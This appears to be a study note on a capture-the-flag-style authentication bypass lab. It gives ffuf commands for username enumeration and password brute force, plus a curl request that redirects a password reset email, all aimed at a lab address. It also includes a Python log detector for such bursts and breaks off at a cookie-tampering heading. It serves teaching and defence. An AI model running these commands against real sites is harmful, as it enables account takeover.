Authentication Bypass
User Enumeration
Website error messages are great for collecting information
Entering the username `admin` and filling the other fields with fake information, you'll get an error like "An account with this username already exists", which confirms that the username is valid.
We can automate this with ffuf, matching only responses that contain the "already exists" message:
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.214.198/customers/signup -mr "username already exists"
Brute Force
Use the usernames found from enumeration to brute force the login. `-fc 200` filters out responses with HTTP status 200, so only the responses that differ (the successful logins) are shown:
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.214.198/customers/login -fc 200
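Both ffuf runs above produce a burst of POSTs from one source to one endpoint, which is easy to spot server-side. The following detector is an added example, not part of the original notes; it assumes Apache/nginx combined log format and the sample log lines are constructed.

```python
"""Flag ffuf-style enumeration/brute-force bursts in web access logs."""
import re
from collections import defaultdict
from datetime import datetime

# Combined log format: ip ident user [ts] "METHOD path proto" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
WATCHED = {"/customers/signup", "/customers/login"}  # endpoints fuzzed above
THRESHOLD = 20  # more than this many POSTs from one IP to one endpoint ...
WINDOW = 60     # ... within this many seconds is treated as automated


def parse(line):
    """Return a dict of fields for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return d


def detect(lines, threshold=THRESHOLD, window=WINDOW):
    """Return {(ip, path): total_posts} for every (ip, path) whose POST rate
    exceeded `threshold` requests inside any `window`-second sliding window."""
    events = defaultdict(list)
    for line in lines:
        d = parse(line)
        if d and d["method"] == "POST" and d["path"] in WATCHED:
            events[(d["ip"], d["path"])].append(d["ts"])
    alerts = {}
    for key, times in events.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while (t - times[start]).total_seconds() > window:
                start += 1  # slide the window forward
            if end - start + 1 > threshold:
                alerts[key] = len(times)
                break
    return alerts


# Constructed sample: 25 signup POSTs in 25 s from one IP (wordlist fuzzing)
# plus one ordinary login from another client.
SAMPLE = [
    f'10.0.0.5 - - [01/Jan/2024:10:00:{i:02d} +0000] "POST /customers/signup HTTP/1.1" '
    f'200 512 "-" "constructed-ua"' for i in range(25)
] + ['10.0.0.9 - - [01/Jan/2024:10:00:30 +0000] "POST /customers/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"']
```

Running `detect(SAMPLE)` flags only the fuzzing source; a single legitimate login stays below the threshold.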
Logic Flaw
A logic flaw is when the typical logical path of an application is either bypassed, circumvented or manipulated

Example
curl 'http://10.10.214.198/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=<address-you-control>'
This uses the Reset Password feature, but the reset email is sent to the different address we pass in the POST body rather than the one belonging to the account.
Cookie Tampering